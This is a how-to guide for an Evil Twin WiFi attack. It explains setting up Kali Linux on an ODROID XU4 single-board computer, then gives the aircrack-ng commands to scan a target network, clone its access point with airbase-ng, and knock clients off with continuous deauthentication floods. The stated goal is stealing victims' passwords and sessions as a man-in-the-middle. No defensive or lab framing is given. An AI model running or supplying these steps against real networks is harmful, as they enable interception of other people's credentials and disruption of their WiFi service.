Evil Twin Attack via Kali on Odroid XU4
The Evil Twin Attack (ET Attack) is a social engineering attacks. It is comparable to a phishing attack, with the difference that ET is carried out via WiFi. The goal is to steal sensitive data from the user. This data can be passwords or entire sessions to access e-mail accounts or social networks. To get access to the user's data, the ET pretends to be an access point. The SSID is exactly the same as that of the WiFi known to the user. After the user's connection to the real WiFi access point has been terminated, the ET appears in the same list - with the same SSID. The user thus thinks that the access point is simply displayed twice and connects to the one that offers a better connection. It is therefore important that the attacker places the fake access point in the immediate vicinity of the victim. Once the victim is connected to the ET, the ET can act unnoticed as a Man-in-the-Middle (MitM). To be able to impersonate a fake WiFi, the attacker needs the password of the actual router. To obtain this password, methods of social engineering attack are used. The better these measures are taken, the more likely it is that the potential victim will fall into the trap.
Operating system: [Kali Linux ODROID-XU3]
- Client connected to WiFi
- ODROID XU4 single-board computer (incl. power supply unit 5V/4A)
- eMMC (min. 8GB)
- microSD (min. 8GB)
- microSD to USB adapter
- Monitor (via HDMI)
- WiFi adapter (e.g. Alfa AWUS036EAC)
Installing Kali on ODROID XU4
Step 1: Download
Download the Kali image. The ODROID XU4 is very similar to the ODROID XU3 thus the OS of XU3 can be used for XU4 too.
Step 2: Preparation
- Insert the microSD card into you PC (if required use the adapter)
- Format the microSD card with e.g. ["SD Fortmatter" ]. If you use "SD Formatter": don't forget to check "Format Size Adjustment" in "Options".
- Add the OS to the microSD card. Required: a program to create bootable devices, e.g. [Win32 Disk Imager for Windows ].
Step 3: Installing
For the following steps you might need the [manual of ODROID XU4 ] to see where the mentioned parts are located.
- Stick the eMMC to the ODROID XU4
- Switch the Boot Mode Selector to "microSD"
- Put in the microSD card
- Attach mouse, keyboard and monitor to the XU4. Make sure that all of them are attached before booting - otherwise you will receive a kernel error.
- After that: attach the power supply.
If all steps were performed correctly:
- The fan of the ODROID XU4 starts
- The blue LED should be on (solid light): bootloader running.
- Monitor should display booting.
This can take a while.
Username: kali Password: kali
States of the ODROID XU4 LED:
- red LED: is on when power is available
- blue LED (solid): when the bootloader is running
- blue LED (blinks slowly, like a heartbeat): kernel is running
- blue LED (blinks fast): kernel is in panic mode
Performing Evil Twin on ODROID XU4
First, add the WiFi adapter to the XU4, reboot and check if it is recognized:
sudo reboot sudo ifconfg
See the available interfaces
Check status of wireless interfaces
Start monitor mode on the available wireless interface.
sudo airmon-ng start <interface> <channel>
Cue: Output has to contain "monitor mode enabled"
Eventually kill processes and execute command again
sudo airmon-ng check kill sudo airmon-ng start <interface> <channel>
sudo airodump-ng <interface> -c <channel>
After 30-40 seconds, press ctrl+c and leave the terminal as it is and open a new one.
Creating the twin
sudo airbase-ng -a <BSSID> --essid <ESSID> -c <channel> <interface>
The data is taken from the previous output and these are required to trick the victim. After running the command, airebase turned the wireless adapter into an access point. Open a new terminal.
In the next step the client and the XU4 will lose the connection to the internet. Because the WiFi Adapter of XU4 is busy acting like an access point, it either needs a second WiFi adapter or an ethernet connection to the internet.
Telling the Client to get lost
Disconnect all Clients:
sudo aireplay-ng --deauth 0 -a <BSSID> <interface>--ignore-negative-one
The "0" indicates how fast the deauthentication packets will be sent (in seconds). 0 is the fastest option. But this command sometimes doesn't work because it could produce a broadcast storm, so some WiFi routers filter them.
Disconnect a specific client: First run the airodump-ng command again, but with BSSID of router to receive the MAC address of the client:
sudo airodump-ng wlan0 --bssid <routers BSSID> -c <routers channel>
Then execute the deauth-command:
sudo aireplay-ng --deauth 0 -c <devices MAC address> -a <routers MAC address> interface>
If neither disconnecting all clients nor disconnecting a specific client worked, you can check if the card supports injection:
sudo aireplay-ng --test wlan0